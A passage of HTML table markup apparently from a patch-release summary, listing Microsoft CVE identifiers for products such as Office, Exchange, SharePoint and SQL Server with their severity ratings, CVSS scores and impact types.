  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55131"><span>CVE-2026-55131</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54131"><span>CVE-2026-54131</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55947"><span>CVE-2026-55947</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55949"><span>CVE-2026-55949</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56156"><span>CVE-2026-56156</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55006"><span>CVE-2026-55006</span></a></td>
  <td width="256" class="xl74">Microsoft Exchange
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55009"><span>CVE-2026-55009</span></a></td>
  <td width="256" class="xl74">Microsoft Exchange
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55005"><span>CVE-2026-55005</span></a></td>
  <td width="256" class="xl74">Microsoft Exchange
  Server Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56642"><span>CVE-2026-56642</span></a></td>
  <td width="256" class="xl74">Microsoft Fabric Data
  Warehouse Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50343"><span>CVE-2026-50343</span></a></td>
  <td width="256" class="xl74">Microsoft Install
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50439"><span>CVE-2026-50439</span></a></td>
  <td width="256" class="xl74">Microsoft Message
  Queuing Queue Manager Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58537"><span>CVE-2026-58537</span></a></td>
  <td width="256" class="xl74">Microsoft NAT Helper
  Components (ipnathlp.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56193"><span>CVE-2026-56193</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55023"><span>CVE-2026-55023</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55026"><span>CVE-2026-55026</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55027"><span>CVE-2026-55027</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55028"><span>CVE-2026-55028</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55047"><span>CVE-2026-55047</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55035"><span>CVE-2026-55035</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55057"><span>CVE-2026-55057</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl75" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55121"><span>CVE-2026-55121</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55042"><span>CVE-2026-55042</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55139"><span>CVE-2026-55139</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50665"><span>CVE-2026-50665</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56192"><span>CVE-2026-56192</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56195"><span>CVE-2026-56195</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47290"><span>CVE-2026-47290</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50301"><span>CVE-2026-50301</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55017"><span>CVE-2026-55017</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55125"><span>CVE-2026-55125</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55133"><span>CVE-2026-55133</span></a></td>
  <td width="256" class="xl74">Microsoft OneNote
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58636"><span>CVE-2026-58636</span></a></td>
  <td width="256" class="xl74">Microsoft PC Manager
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50438"><span>CVE-2026-50438</span></a></td>
  <td width="256" class="xl74">Microsoft PC Manager
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58647"><span>CVE-2026-58647</span></a></td>
  <td width="256" class="xl74">Microsoft PowerBI
  Report Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55052"><span>CVE-2026-55052</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58277"><span>CVE-2026-58277</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55051"><span>CVE-2026-55051</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54108"><span>CVE-2026-54108</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55016"><span>CVE-2026-55016</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55019"><span>CVE-2026-55019</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55020"><span>CVE-2026-55020</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55021"><span>CVE-2026-55021</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55030"><span>CVE-2026-55030</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55034"><span>CVE-2026-55034</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55126"><span>CVE-2026-55126</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55135"><span>CVE-2026-55135</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56157"><span>CVE-2026-56157</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47296"><span>CVE-2026-47296</span></a></td>
  <td width="256" class="xl74">Microsoft SQL Server
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55002"><span>CVE-2026-55002</span></a></td>
  <td width="256" class="xl74">Microsoft SQL Server
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47295"><span>CVE-2026-47295</span></a></td>
  <td width="256" class="xl74">Microsoft SQL Server
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50468"><span>CVE-2026-50468</span></a></td>
  <td width="256" class="xl74">Microsoft SQL Server
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54116"><span>CVE-2026-54116</span></a></td>
  <td width="256" class="xl74">Microsoft SQL Server
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42900"><span>CVE-2026-42900</span></a></td>
  <td width="256" class="xl74">Microsoft Windows App
  Store Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49784"><span>CVE-2026-49784</span></a></td>
  <td width="256" class="xl74">Microsoft Windows App
  Store Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50356"><span>CVE-2026-50356</span></a></td>
  <td width="256" class="xl74">Microsoft Windows App
  Store Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49165"><span>CVE-2026-49165</span></a></td>
  <td width="256" class="xl74">Microsoft Windows App
  Store Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54993"><span>CVE-2026-54993</span></a></td>
  <td width="256" class="xl74">Microsoft Windows
  Media Foundation Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58610"><span>CVE-2026-58610</span></a></td>
  <td width="256" class="xl74">Microsoft Windows
  Media Foundation Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55050"><span>CVE-2026-55050</span></a></td>
  <td width="256" class="xl74">Microsoft Word
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55124"><span>CVE-2026-55124</span></a></td>
  <td width="256" class="xl74">Microsoft Word
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55142"><span>CVE-2026-55142</span></a></td>
  <td width="256" class="xl74">Microsoft Word
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55032"><span>CVE-2026-55032</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55055"><span>CVE-2026-55055</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55038"><span>CVE-2026-55038</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55134"><span>CVE-2026-55134</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55128"><span>CVE-2026-55128</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55130"><span>CVE-2026-55130</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50359"><span>CVE-2026-50359</span></a></td>
  <td width="256" class="xl74">Microsoft XML Core
  Services Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57097"><span>CVE-2026-57097</span></a></td>
  <td width="256" class="xl74">Microsoft XML Security
  Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50346"><span>CVE-2026-50346</span></a></td>
  <td width="256" class="xl74">Netlogon RPC Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50402"><span>CVE-2026-50402</span></a></td>
  <td width="256" class="xl74">NTFS Elevation of
  Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50506"><span>CVE-2026-50506</span></a></td>
  <td width="256" class="xl74">OData for ASP.NET and
  ASP.NET Core Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45646"><span>CVE-2026-45646</span></a></td>
  <td width="256" class="xl74">OData for ASP.NET and
  ASP.NET Core Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54989"><span>CVE-2026-54989</span></a></td>
  <td width="256" class="xl74">Quality Windows
  Audio/Video Experience (QWAVE) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
